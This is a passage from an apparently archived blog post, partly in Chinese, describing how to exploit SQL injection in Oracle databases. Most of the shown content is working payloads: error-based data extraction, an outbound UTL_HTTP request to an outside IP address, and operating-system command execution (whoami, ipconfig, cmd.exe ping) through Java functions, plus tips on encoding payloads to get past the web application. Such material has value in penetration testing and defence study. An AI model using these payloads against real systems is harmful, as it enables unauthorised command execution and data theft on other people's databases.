10.2.0.3.0\n<\/code><\/pre><\/div><\/div>\n<p><img src=\"\/images\/posts\/hackingoracle\/3.png\" alt=\"image\" \/><\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>' and UTL_HTTP.REQUEST('http:\/\/74.121.151.89:53')='1'--   # outbound connectivity check: watch for the request on a listener you control; here it arrived\n<\/code><\/pre><\/div><\/div>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code> ' and 1 = ctxsys.drithsx.sn(1,(select wmsys.wm_concat(granted_role) from user_role_privs))--\n current user's roles: CONNECT,RESOURCE\n<\/code><\/pre><\/div><\/div>\n<p><img\u0020
src=\"\/images\/posts\/hackingoracle\/4.png\" alt=\"image\" \/> \n\u63d0\u6743\u5230dba\u7686\u5931\u8d25<br \/>\n11.1.0.7.0\u4ee5\u4e0b\u53ef\u4ee5\u7528dbms_xmlquery.newcontext\u6765\u6267\u884cpl\/sql\u6765\u6267\u884c\u547d\u4ee4(\u547d\u4ee4\u5728\u4e0a\u9762)\n  <img src=\"\/images\/posts\/hackingoracle\/5.png\" alt=\"image\" \/> \n\u4f9d\u6b21\u6267\u884c\u4e0a\u9762sql\u8bed\u53e5\u540e \u53ef\u4ee5\u5728navicat\u4e2d\u67e5\u770b\n\u6267\u884cselect * from user_objects\u53ef\u4ee5\u67e5\u770b\u76f8\u5173\u51fd\u6570\u662f\u5426\u521b\u5efa\u6210\u529f\n<img src=\"\/images\/posts\/hackingoracle\/6.png\" alt=\"image\" \/> \n\u6267\u884cselect * from user_java_policy \u67e5\u770b\u5176\u76f8\u5e94\u7684\u6743\u9650\u662f\u5426\u52a0\u4e0a\n<img src=\"\/images\/posts\/hackingoracle\/7.png\" alt=\"image\" \/> \n\u5728web\u4e2d \u53ef\u4ee5\u4f7f\u7528\u4e0b\u9762\u7684\u8bed\u53e5\u6765\u5224\u65ad\u662f\u5426\u52a0\u4e0a<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>' and 1 = ctxsys.drithsx.sn(1,(select count(*) from user_java_policy where grantee_name='TEST'))--\n' and 1 = ctxsys.drithsx.sn(1,(select * from user_objects where OBJECT_NAME='javaexec'))--\n<\/code><\/pre><\/div><\/div>\n<p>\u6700\u540e\u6267\u884c\u547d\u4ee4 whoami\u4f1a\u62a5\u9519(\u5177\u4f53\u539f\u56e0\u4e0d\u8be6) \u4f46\u7a0b\u5e8f\u8fd8\u662f\u4f1a\u6267\u884c \u60f3\u8981\u5b9e\u65f6\u67e5\u770b\u53ef\u4ee5\u6362\u4e2a\u547d\u4ee4 \u4ee5\u4e0b\u5206\u522b\u662f\u56db\u4e2a\u622a\u56fe\u7684\u6548\u679c<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>'||utl_inaddr.get_host_name((select javacmd('whoami') from dual))||'\n'||utl_inaddr.get_host_name((select javacmd('ping 8.8.8.8') from dual))||'\n'||utl_inaddr.get_host_name((Select DBMS_JAVA_TEST.FUNCALL('oracle\/aurora\/util\/Wrapper','main','c:\\\\windows\\\\system32\\\\cmd.exe','\/c','ping 74.121.151.89') from dual))||'   
# note: this one returns nothing to the page, confirm it on the ping target instead\n'||utl_inaddr.get_host_name((select utl_raw.cast_to_varchar2(utl_encode.base64_encode(utl_raw.cast_to_raw(javacmd('ipconfig')))) from dual))||' # base64-encoding the output keeps newlines and special characters from being mangled in the reflected error text, which is sometimes easier to read\n<\/code><\/pre><\/div><\/div>\n<p>whoami\n<img src=\"\/images\/posts\/hackingoracle\/8.png\" alt=\"image\" \/> \nping 8.8.8.8\n<img src=\"\/images\/posts\/hackingoracle\/9.png\" alt=\"image\" \/> \nDBMS_JAVA_TEST.FUNCALL\n<img src=\"\/images\/posts\/hackingoracle\/10.png\" alt=\"image\" \/> \nbase64 encode\n<img src=\"\/images\/posts\/hackingoracle\/12.png\" alt=\"image\" \/> \nSome pitfalls to watch out for:<\/p>\n<ul>\n  <li>Some statements run fine when pasted straight into Navicat but fail when sent through the web application, so test locally first and only then CHR()-encode for the injection point. Single quotes inside a PL\/SQL string literal are escaped by doubling, and every further level of nesting doubles them again, which is why runs of four quotes ('''') appear in the locally tested statements. When the outer literal is replaced by a CHR() chain, one level of escaping disappears: '''' becomes '' and '' becomes '. <br \/>\nOther reference links:\n    <div class=\"highlighter-rouge\"><div class=\"highlight\"><pre\u0020
class=\"highlight\"><code>https:\/\/redn3ck.github.io\/2018\/04\/25\/Oracle%E6%B3%A8%E5%85%A5-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C-Shell%E5%8F%8D%E5%BC%B9\/\nhttps:\/\/www.t00ls.net\/articles-23608.html\nhttps:\/\/github.com\/alexei-led\/docker-oracle-xe-11g\nhttps:\/\/www.secpulse.com\/archives\/30872.html\nhttp:\/\/psoug.org\/articles\/Hacking-Aurora-in-Oracle-11g.htm\nhttp:\/\/www.red-database-security.com\/tutorial\/run_os_commands_via_webapp.html\n<\/code><\/pre><\/div>    <\/div>\n    <p>#\n\u8f6c\u8f7d\u8bf7\u6ce8\u660e\uff1a<a href=\"https:\/\/notwhy.github.io\/\">whynot<\/a> \u00bb <a href=\"https:\/\/notwhy.gitbooks.io\/\/2018\/06\/hacking-oracle\/\">hacking_ora<\/a><\/p>\n  <\/li>\n<\/ul>\n\n","pubDate":"Tue, 19 Jun 2018 00:00:00 +0000","link":"http:\/\/notwhy.github.io\/2018\/06\/hacking-oracle\/","guid":"http:\/\/notwhy.github.io\/2018\/06\/hacking-oracle\/","category":"sql-injection"}]}}